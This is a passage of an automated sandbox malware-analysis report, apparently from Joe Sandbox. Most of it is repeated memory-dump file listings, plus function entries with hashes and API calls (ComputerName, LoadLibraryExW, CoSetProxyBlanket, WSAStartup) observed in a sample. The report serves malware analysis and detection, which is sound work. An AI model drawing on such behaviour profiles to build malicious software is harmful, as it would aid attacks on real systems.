Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: ComputerName
String ID: KHGN
API String ID: 3545744682-1032087821
Opcode ID: f30e060bfc776ced8c38af01952f0bf2bc30971fb7f7b157140c5f9e6e37a0d8
Instruction ID: 8bf201afbed0c18a7968ae9c6df08bea265611e9156baab2f531fae7fcb59e9c
Opcode Fuzzy Hash: f30e060bfc776ced8c38af01952f0bf2bc30971fb7f7b157140c5f9e6e37a0d8
Instruction Fuzzy Hash: 2F1125701483858FDB218F3998A1BFB7FE4EB8B345F1448ACE1C9D7281CB3548069B52

Function 00B19D5E Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00B19E1A

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8ad70c5dde544d0bc4bf3f6efc7e004bcd8b0e474a72749a5d248e80a2e49355
Instruction ID: 3147e0e1fe2ca51baff059606fd542c5e21e71ec3e947ecd5922efd5a9de45b8
Opcode Fuzzy Hash: 8ad70c5dde544d0bc4bf3f6efc7e004bcd8b0e474a72749a5d248e80a2e49355
Instruction Fuzzy Hash: 1A1138756443508FC7188F25D8916A97FE1EB55322B1980ECD481EB366C63CD846CB60

Function 00B4D880 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8ddd3913b595d6b75fcba83293c7df72c21eb25af8162043e09b811a1e576d
Instruction ID: e13add4bce4e5504212e28cdd851705d9bb7e90e967e47bfb1fc86b3273c1831
Opcode Fuzzy Hash: ab8ddd3913b595d6b75fcba83293c7df72c21eb25af8162043e09b811a1e576d
Instruction Fuzzy Hash: 75F06D71118301EFE7201F24FC99F2736B8EF8A752F0408B9F501921A2EF25ED149661

Function 00B3DE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00B3DE5A

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c7067c14df2a2e28b762ae78ef5b491d4804b050532b80088e7e3e24cc70c526
Instruction ID: fdaf311f7e720581ba0378b834f176bc71dab99661253b8d4cd3d8079a297aef
Opcode Fuzzy Hash: c7067c14df2a2e28b762ae78ef5b491d4804b050532b80088e7e3e24cc70c526
Instruction Fuzzy Hash: 9AF0E2756097028FE301CF25D55470BBBF6BB88314F25891CE0A85B794C7B5AA898FC2

Function 00B416B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00B416F7

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2a1bc730f4c9b3183a78b34c6e0716b64b5f8852597a1421b632cbc5c38a62ff
Instruction ID: 9d5935a6854487638df180bc852f514f06d30b41de99e98c682d4ba5e0c4d329
Opcode Fuzzy Hash: 2a1bc730f4c9b3183a78b34c6e0716b64b5f8852597a1421b632cbc5c38a62ff
Instruction Fuzzy Hash: BDF074B46093029FE354DF69D5A871BBBF1EB88304F11881DE5958B390DBB59648CF82

Function 00B19CAE Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00B19CC6

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
